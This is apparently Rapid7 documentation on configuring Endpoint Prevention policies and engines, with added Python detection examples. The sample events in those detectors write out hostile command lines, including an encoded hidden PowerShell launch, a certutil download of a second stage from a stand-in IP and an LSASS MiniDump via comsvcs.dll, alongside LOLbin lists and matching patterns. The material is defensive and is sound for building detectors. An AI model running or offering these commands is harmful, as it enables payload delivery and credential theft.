Configure your Endpoint Prevention strategy with policies

Endpoint Prevention is available to Managed Detection and Response and Managed Threat Complete customers who also have the Next-Generation Antivirus or Ransomware Prevention add-ons.

The policy attached to a prevention group is composed of categories of detection logic called prevention engines. Each engine is designed to detect specific threats and instruct the Insight Agent on what action to take when a threat is detected. You can tune the behavior of each engine individually, and select which engines to use collectively, to meet the goals of your Endpoint Prevention program.

This article describes prevention policies in general, explains each prevention engine you can include in a policy and the behavior it is designed to detect, covers the actions the Insight Agent can take against detected threats, and walks through the configuration process.

Prevention policy rules and characteristics

A prevention policy exists solely within a prevention group and has a one-to-one relationship with that group. A group's policy defines what prevention engines should be actively monitoring the group's member agents for threats.

You have full configuration control over the policies attached to your custom prevention groups. An exception to this is the default prevention group and the default prevention policy attached to it. This policy is immutable and its configuration is maintained solely by Rapid7.

Agent actions

You can separately configure how the Insight Agent will respond to detected threats for each prevention engine in your policy. Overall, the Insight Agent is capable of these actions:

  • Block - The Insight Agent will actively block any threat detected by the prevention engine and generate an alert in InsightIDR. Depending on the context of the threat, this could involve terminating malicious processes, denying access to files, and other active prevention methods.
  • Disinfect - Specific to the On-Access Scanning engine, the Insight Agent will attempt to remove the detected threat from affected files and generate an alert in InsightIDR.
  • Detection Only - The Insight Agent will take no action other than generating an alert in InsightIDR.
    • This setting disables Endpoint Prevention's active protection for that engine. Some asset behaviors may not warrant agent intervention beyond an alert, but be aware that your security team is then responsible for responding to every threat detected in this mode.

Rule priority

Like agent actions, you can separately configure the priority level of alerts generated by each of your prevention engines in your policy. When your security team sees these alerts in InsightIDR, the priority level you assign here will be tagged in the alert itself.

Endpoint Prevention supports these priority levels:

  • Low
  • Medium
  • High

How you contextualize these priority levels for your security team is up to you.
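The action and priority rules above can be checked before a policy is saved. The following script is an added example, not code from this page or from the Insight Platform; the PreventionPolicy and EngineSetting structures, their field names and the validate_policy helper are assumptions of the example, and the engine names are the ones documented later in this article. It rejects Disinfect on any engine other than On-Access Scanning, refuses edits to the immutable default policy, and warns on engines that are switched off or left in Detection Only.

```python
"""Policy-as-code check of the prevention policy rules described above.

Added example: not Rapid7 code and not the Insight Platform's policy format.
The PreventionPolicy/EngineSetting structures, field names and the
validate_policy helper are assumptions of this example."""
from dataclasses import dataclass, field

# Engine names as documented in this article.
ENGINES = (
    "On-Access Scanning",
    "Memory Injection Attacks",
    "Living-Off-the-Land Attacks",
    "Malicious Document Attacks",
    "OS Credential Dumping Attacks",
    "File and Process Manipulation Attacks",
    "Data Encryption Attacks",
)
ACTIONS = {"Block", "Disinfect", "Detection Only"}
PRIORITIES = {"Low", "Medium", "High"}


@dataclass
class EngineSetting:
    enabled: bool = True
    action: str = "Block"
    priority: str = "High"


@dataclass
class PreventionPolicy:
    group: str                      # one policy per prevention group
    engines: dict = field(default_factory=dict)
    is_default: bool = False        # the Rapid7-managed default policy is immutable


def validate_policy(current, proposed=None):
    """Return (errors, warnings) for `proposed`, or for `current` when no edit
    is proposed. Errors must be fixed before saving; warnings point at engines
    that will not actively protect the group."""
    errors, warnings = [], []
    if current.is_default and proposed is not None and proposed.engines != current.engines:
        errors.append("default prevention policy is maintained by Rapid7 and cannot be edited")
    policy = proposed if proposed is not None else current
    for name in ENGINES:
        setting = policy.engines.get(name)
        if setting is None:
            errors.append(f"{name}: no setting configured")
            continue
        if setting.action not in ACTIONS:
            errors.append(f"{name}: unknown action {setting.action!r}")
        if setting.priority not in PRIORITIES:
            errors.append(f"{name}: unknown priority {setting.priority!r}")
        if setting.action == "Disinfect" and name != "On-Access Scanning":
            errors.append(f"{name}: Disinfect is only available for On-Access Scanning")
        if not setting.enabled:
            warnings.append(f"{name}: switched off; nothing is detected or alerted. "
                            "Consider Detection Only instead.")
        elif setting.action == "Detection Only":
            warnings.append(f"{name}: Detection Only; alerts are raised but no action is taken.")
    return errors, warnings


def sample_policy():
    """A constructed custom-group policy with one invalid and two weak settings."""
    engines = {name: EngineSetting() for name in ENGINES}
    engines["Memory Injection Attacks"].action = "Disinfect"          # invalid: not On-Access Scanning
    engines["Data Encryption Attacks"].enabled = False                 # weak: engine switched off
    engines["Living-Off-the-Land Attacks"].action = "Detection Only"   # weak: alert only
    engines["Living-Off-the-Land Attacks"].priority = "Medium"
    return PreventionPolicy(group="finance-workstations", engines=engines)


if __name__ == "__main__":
    errs, warns = validate_policy(sample_policy())
    print("\n".join(["ERROR: " + e for e in errs] + ["WARN:  " + w for w in warns]))
```

The check is deliberately conservative: a disabled engine and a Detection Only engine both produce a warning rather than an error, because the page allows either choice, but the reviewer saving the policy should have to see which groups will only ever alert.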

Prevention engine details

Prevention engines protect your assets from ransomware and other forms of malware that rely on common evasive techniques. The following prevention engines are available for use and configuration in your policies. This section provides a high-level explanation of what each engine detects.

Prevention engines included in your license

If the On-Access Scanning (Antivirus) prevention engine documented here does not appear in your environment, check your license or contact Rapid7 if you wish to upgrade. If you do not have this prevention engine, antivirus scans won't be run, but the other prevention engines will operate as usual. You can also use a third-party antivirus product: the advanced prevention engines will operate and run alongside it.

On-Access Scanning (Antivirus)

The On-Access Scanning prevention engine scans local and network files for malware in real time when a user accesses them, such as when a file is opened, moved, copied, or executed. When infected files are detected, you decide the action to take on them.

In addition to the Block and Detection Only agent actions, On-Access Scanning is the only engine that can also instruct the agent to run the Disinfect action, which attempts to remove the detected threat from affected files.

The Antivirus Health indicator shown for each agent in your Agents table is tied directly to the status of this prevention engine in each of your policies.

On-Access Scanning also includes additional configuration options that let you tune the scope of its scanning:

These scanning options are potentially resource-intensive

Depending on the contents and behaviors of your assets, they may experience a performance impact if your policy specifies additional scanning options beyond the recommended configuration set by the default prevention policy.

  • Scan Email - Enables the scanning of plaintext emails, email databases, and disinfection inside those databases.
  • Scan Potentially Unwanted Applications (PUA) - Enables the scanning of programs that may be unwanted on the asset, such as those that come bundled with free software.
  • Scan Archives - Enables the scanning of file archives (such as "recently deleted") during a content scan.
  • Scan Packed - Enables scanning and disinfection inside packed executables.
  • Antimalware Scan Interface (AMSI) - Enables the scanning of scripts, files, and similar content coming from other programs for malware before they can make changes to the asset.

Memory Injection Attacks

Some malicious software can inject and hide itself in a legitimate process. The Memory Injection Attacks prevention engine stops fileless threats and blocks code execution from the file system, causing such malware to exit or crash.

More information

Why it’s used

Previously, malware attacks typically involved malicious processes, which either carried out the attack or downloaded a file-based payload with malicious code. These processes were found by threat analysts and security software that listed running processes, distinguishing suspicious processes from legitimate ones.

How it’s used

Malware authors are now aware of this countermeasure and have created a way to circumvent it, using techniques known as process injection or memory injection.

Process and memory injection make it harder for security tools to detect malicious processes. These techniques run malicious code inside the address space (the range of memory addresses allocated to a particular program or process) of a legitimate process or a sensitive OS process. Sometimes malware also unpacks malicious code into its own process as a form of self-injection, using a skeleton process that is already present in memory.

How Endpoint Prevention blocks it

Endpoint Prevention stops fileless and other memory-resident malware from hiding in legitimate processes and evading detection. For example, Ransomware Prevention deceives the malware about its ability to unpack code solely in a process’ memory space without exposing or loading a dynamic link library (DLL) into the process memory, stopping the attack before it does any damage.

Resulting actions

The code injection is blocked from unpacking itself in the destination or targeted process.

Forensic information available in alerts

In addition to the standard details, the resulting alert provides information about the destination process and the malware involved in the injection attempt. It also provides a list of all loaded modules (DLLs) in the process that triggered the alert.

Living-Off-the-Land Attacks

Different from classic forms of malware, a Living-Off-the-Land attack attempts to cause damage by misusing tools that are built into the system. The Living-Off-the-Land Attacks prevention engine blocks the malicious software's ability to leverage such tools to infect an asset.

More information

Why it’s used

Living off the land (LOTL or LOL) is an evasion technique that takes advantage of trusted system utilities, libraries, tools, and components, which are native to the operating system. The operations that this software performs appear to be legitimate, even though they are performed on behalf of a threat actor.

How it’s used

Malware uses LOLbins to perform operations that appear routine. For example, malware can perform lateral movement, download malicious artifacts, and move to another stage of the attack without triggering an alert. These operations can use trusted utilities and components, including those that are digitally signed.

How Endpoint Prevention blocks it

Endpoint Prevention stops unwanted parent-child process executions by hiding LOLbins from the offending process, so the attacker's code cannot locate and launch them to continue the attack.

Resulting actions

Endpoint Prevention blocks the offending process from spawning LOLbins.

Forensic information available in alerts

In addition to the standard details, the resulting alert provides the blocked command line that attempted to execute the child process.

Malicious Document Attacks

Malicious documents can sometimes misuse features such as macros, scripts, and built-in tools. The Malicious Document Attacks prevention engine disarms the malicious documents' attempts and allows applications to operate without being infected.

More information

Why it’s used

Threat actors use documents to lure victims through phishing or social engineering attacks, allowing them to deliver malicious code and gain a foothold on a machine. Traditional antivirus (AV) tools and threat analysts typically detect malware by comparing the hash of the document file to the malware hashes in their database.

However, it’s more difficult to detect malicious activity in the popular software used to open these documents, such as Microsoft Office or Adobe products. This software is often misused as an evasive technique: it carries out the document’s malicious code on its behalf while remaining undetected, because the software itself is considered legitimate.

How it’s used

Malware uses legitimate document software to run macros, open script interpreters, obfuscate malicious code, use add-ons and extensions, download scripts, execute another executable program, and more.

How Endpoint Prevention blocks it

Endpoint Prevention isolates the document in the container software used to open it by preventing interaction with other script interpreters and executables that appear unusual or risky.

Resulting actions

Endpoint Prevention blocks the document's host application from spawning risky child processes on the malware's behalf.

Forensic information available in alerts

In addition to the standard details, the resulting alert provides the blocked command line that attempted to execute the child process.
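Both the Living-Off-the-Land and Malicious Document engines come down to parent-child process relationships: a document host or an unexpected parent launching a built-in binary with payload-style arguments. The script below is an added example of that rule logic run over constructed process-creation events; it is not the Insight Agent's engine (which hides the binaries rather than pattern-matching command lines) and not its event format. The event fields, the binary sets, the allowlist, the SUSPICIOUS_ARGS pattern and the evaluate helper are assumptions of the example.

```python
"""Parent/child process rules of the kind the Living-Off-the-Land and Malicious
Document engines enforce, run over constructed process-creation events.

Added example: not the Insight Agent's engine and not its event format. The
event fields, the binary sets below and the evaluate() helper are assumptions."""
import re

# Document host applications in scope for the Malicious Document rule (assumed set).
DOCUMENT_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
# Built-in Windows binaries routinely abused to run code (illustrative LOLbin set).
LOLBINS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe"}
# Parents that launch these binaries as part of normal operation (assumed allowlist).
EXPECTED_PARENTS = {"explorer.exe", "services.exe", "svchost.exe", "userinit.exe"}
# Command-line indicators that the LOLbin is being used to fetch or run a payload.
SUSPICIOUS_ARGS = re.compile(
    r"(-enc\w*\s|-w(indowstyle)?\s+hidden|downloadstring|-urlcache|https?://|/i:|javascript:)",
    re.IGNORECASE)


def _base(path):
    """Case-folded file name of an image path (backslash or forward slash)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return a block verdict for one process-creation event, or None to allow it.

    The verdict records the engine and the blocked command line, which are the
    forensic details the page says the corresponding alert carries."""
    parent, child = _base(event["parent_image"]), _base(event["image"])
    cmd = event["command_line"]
    # Malicious Document: a document host may not spawn script interpreters or LOLbins.
    if parent in DOCUMENT_HOSTS and child in LOLBINS:
        return {"engine": "Malicious Document Attacks", "action": "Block",
                "parent": parent, "child": child, "blocked_command": cmd}
    # Living-Off-the-Land: a LOLbin launched by an unexpected parent with payload-style args.
    if child in LOLBINS and parent not in EXPECTED_PARENTS and SUSPICIOUS_ARGS.search(cmd):
        return {"engine": "Living-Off-the-Land Attacks", "action": "Block",
                "parent": parent, "child": child, "blocked_command": cmd}
    return None


# Constructed events; paths, addresses and command lines are illustrative only.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"parent_image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://198.51.100.7/stage2.dat stage2.dat"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c dir C:\\Users\\alice\\Documents"},
    {"parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"},
]


def run_sample(events=SAMPLE_EVENTS):
    """Evaluate each event and return only the blocked ones, in order."""
    return [v for v in (evaluate(e) for e in events) if v is not None]


if __name__ == "__main__":
    for verdict in run_sample():
        print(f"{verdict['engine']}: blocked {verdict['parent']} -> {verdict['child']}: "
              f"{verdict['blocked_command']}")
```

Two of the four constructed events are blocked: the Word document launching an encoded, hidden PowerShell, and the dropper in a user's Temp directory using certutil to fetch a second stage. The explorer-launched cmd.exe and the svchost-launched rundll32.exe are allowed, which is why an allowlist keyed only on the parent image is a weak control on its own: a process injected into explorer.exe or svchost.exe would inherit that trust, and that case belongs to the Memory Injection Attacks engine rather than to this rule.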

OS Credential Dumping Attacks

Attackers or malware can sometimes attempt to harvest operating system credentials to gain access to an environment. The OS Credential Dumping Attacks prevention engine protects sensitive files, processes, and other key artifacts to prevent this type of threat.

More information

Why it’s used

It takes multiple steps for ransomware to be successful, including shutting down security controls and accessing restricted information to hold for ransom. Spreading through a network requires lateral movement, where attackers can attempt to dump credentials, allowing them to obtain account logins that enable their malware to move laterally.

How it’s used

Adversaries might attempt to access credentials stored in the process memory of the Local Security Authority Subsystem Service (LSASS). They can deploy tools that allow them to extract this data, exploit legitimate applications and processes, and use LOLbins to dump sensitive, credential information.

How Endpoint Prevention blocks it

Endpoint Prevention cloaks sensitive files, processes, and other artifacts, preventing attackers or their malware from harvesting credentials or other sensitive data—even if the threat finds a way to run on the system.

Resulting actions

Endpoint Prevention monitors API calls that attempt to read credentials from LSASS process memory and denies that access. It also prevents snapshot (memory dump) creation of LSASS using a LOLbin.

Forensic information available in alerts

In addition to the standard details, the resulting alert provides information about the sensitive asset where credential harvesting was attempted. It also provides the blocked command line involved in the attempt.
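The two paths the engine covers, a process opening LSASS memory for reading and a snapshot dump written by a LOLbin, can be expressed as detection logic over process-access and process-creation events. The script below is an added example, not the Insight Agent's engine (which hooks the API calls on the endpoint rather than reading telemetry afterwards) and not an InsightIDR alert format. The event shapes borrow the field names of Sysmon's ProcessAccess (Event ID 10) and ProcessCreate (Event ID 1); the allowlist, the DUMP_COMMANDS patterns, the PIDs, paths and sample events are assumptions of the example.

```python
"""Detection logic for the two credential-dumping paths described above: a
process opening LSASS memory for reading, and a snapshot dump created with a
LOLbin. Run over constructed events.

Added example: not the Insight Agent's engine, which hooks the API calls
itself. The event shapes borrow Sysmon's ProcessAccess (Event ID 10) and
ProcessCreate (Event ID 1) field names; the allowlist, patterns and sample
events are assumptions of this example."""
import re

# Windows process access rights relevant to reading or tampering with another process's memory.
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_CREATE_THREAD = 0x0002
DUMP_RIGHTS = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD

# System processes with a legitimate need to open lsass.exe (assumed; tune per fleet).
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\svchost.exe",
}

# Command-line shapes used to write an LSASS memory snapshot with built-in tooling.
DUMP_COMMANDS = [
    re.compile(r"comsvcs(\.dll)?\s*,?\s*minidump", re.I),   # rundll32 comsvcs.dll, MiniDump <pid> <file> full
    re.compile(r"\blsass(\.exe)?\b.*\.dmp\b", re.I),         # any tool naming lsass and a .dmp output
]


def _image_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_access(ev):
    """ProcessAccess event: block reads of lsass memory by non-allowlisted code."""
    if _image_name(ev["TargetImage"]) != "lsass.exe":
        return None
    granted = int(ev["GrantedAccess"], 16)
    if not granted & DUMP_RIGHTS:
        return None          # query-only handles (e.g. 0x1400) cannot read memory
    if ev["SourceImage"].lower() in ALLOWED_SOURCES:
        return None
    return {"engine": "OS Credential Dumping Attacks", "action": "Block",
            "technique": "lsass memory access", "source": ev["SourceImage"],
            "granted_access": hex(granted), "protected_asset": ev["TargetImage"]}


def check_process_create(ev):
    """ProcessCreate event: block snapshot dumps of lsass via a LOLbin command line."""
    cmd = ev["CommandLine"]
    if any(p.search(cmd) for p in DUMP_COMMANDS):
        return {"engine": "OS Credential Dumping Attacks", "action": "Block",
                "technique": "lsass snapshot dump", "protected_asset": "lsass.exe",
                "blocked_command": cmd}
    return None


# Constructed events (illustrative paths, PIDs and command lines).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\svc_update.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Vendor\monitor.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 1, "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 612 C:\Temp\ls.dmp full"},
    {"EventID": 1, "CommandLine": r"cmd.exe /c type C:\Temp\notes.txt"},
]


def run_sample(events=SAMPLE_EVENTS):
    """Route events by ID and return the resulting block verdicts in order."""
    verdicts = []
    for ev in events:
        v = check_process_access(ev) if ev["EventID"] == 10 else check_process_create(ev)
        if v is not None:
            verdicts.append(v)
    return verdicts
```

The access-mask check matters as much as the target name: a handle opened with 0x1400 (query rights only) cannot read credential material and is normal for inventory and monitoring tools, so alerting on every open of lsass.exe would bury the real reads. The allowlist is the weak spot of this approach, since code injected into svchost.exe would pass it; on the endpoint that case is covered by the Memory Injection Attacks engine, and a Task Manager "Create dump file" action produces no command line at all, which is why the page's engine watches the API calls rather than only process creation.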

File and Process Manipulation Attacks

Malicious software can attempt to manipulate other software applications and processes to gain access to an asset’s internal files. This prevention engine prevents malware from making deceptive modifications to files and processes.

More information

Why it’s used

Traditional antivirus (AV) tools and threat analysts typically detect malware by comparing the hash of a file or process with the malware hashes in their database. Additionally, file systems often require dedicated permissions or access controls.

Making too many changes on a file system can trigger existing endpoint security controls, which block malware activity. However, legitimate programs with direct access can read and write files directly from the drive by analyzing file systems. These programs can access sensitive or vulnerable files in a way that doesn’t raise suspicion.

How it’s used

To avoid detection, adversaries abuse programs that already have direct access to file systems and can read and write files directly from the drive. These programs can be used to access sensitive files and then read, write, or execute on the malware’s behalf. This technique can bypass Windows file access controls and file system monitoring tools.

How Endpoint Prevention blocks it

To prevent the evasive techniques that exploit access to a file system, Endpoint Prevention can control access to the file system, making it inaccessible or unchangeable.

Resulting actions

Endpoint Prevention blocks attempts from the malicious process to access restricted file systems by manipulating the access controls to the file or path.

Forensic information available in alerts

In addition to the standard details, the resulting alert provides information about the blocked path that the process attempted to reach.

Data Encryption Attacks

Malicious software, particularly ransomware, can introduce processes that silently encrypt files. If this behavior is detected, Endpoint Prevention will terminate the destructive process.

More information

Why it’s used

Encryption occurs often in a Windows OS and is not necessarily malicious. Many built-in and third-party tools use native OS functions and methods of encryption to meet their functional requirements. These encryption methods, which are usually unmonitored, are often time and resource intensive.

Encryption makes it harder for endpoint security tools and threat analysts to identify ransomware as malicious. However, once the ransomware is detected, a signature is immediately created, preventing further infections.

How it’s used

Malware authors are aware of this technical challenge and have created a way to avoid it, using hidden or nested threads that allow them to execute their malicious code quickly while remaining unnoticed.

How Endpoint Prevention blocks it

Endpoint Prevention blocks ransomware’s attempts to hide in process threads. Instead of monitoring the encryption method itself, Endpoint Prevention monitors suspicious thread activities, rendering this technique ineffective.

Resulting actions

Endpoint Prevention terminates the process initiating hidden or nested threads.

Forensic information available in alerts

In addition to the standard details, the resulting alert provides information about the process that initiated the attack.

How to configure a prevention policy

How to access the Agent Management interface

All aspects of your Endpoint Prevention program are configurable in the Agent Management experience of Insight Platform Home. Your Insight account must have either the Platform Administrator role or a Product Administrator role to access Agent Management:

  1. Go to https://insight.rapid7.com/login and sign in with your Insight account email address and password.
    • If you are not directed to Insight Platform Home upon successfully signing in, open the navigator in the upper left corner of your screen and click Insight Platform Home.
  2. Open the Data Collection tab in the left menu and click Agents.
    • Use the dropdown next to Agent Management to select the organization for which you want to configure Endpoint Prevention. If you only have access to one organization, it will already be selected.

To configure a prevention policy:

  1. Click the Endpoint Prevention tab in Agent Management. The Prevention Groups subtab will already be selected.
  2. In your Prevention Groups table, browse to the custom prevention group you want to configure a policy for and click its table row. The Edit Prevention Group interface will display.
  3. Scroll to the Prevention Policy Configuration section. The policy will be locked initially, so click Edit Policy to unlock all configuration options.
  4. Use the sliders to select which prevention engines the policy should use.

Make your engine choices carefully!

If you turn off an engine for this policy, agents associated with this prevention group will be unable to detect, and therefore, unable to alert and act on any threat this engine would have otherwise detected. If you choose to turn off a prevention engine, do so carefully and with clear intentions.

As an alternative to turning off a prevention engine, consider keeping it enabled in Detection Only mode so you continue to receive alerts on detected activity.

  5. Configure what action the Insight Agent should take for each engine and what priority their corresponding alerts should be tagged with.
    • For the On-Access Scanning prevention engine, use the check boxes to configure the scope of the engine's scanning functionality.
  6. Click Save Changes when finished, or Cancel to abandon your progress and return the policy to its prior saved state.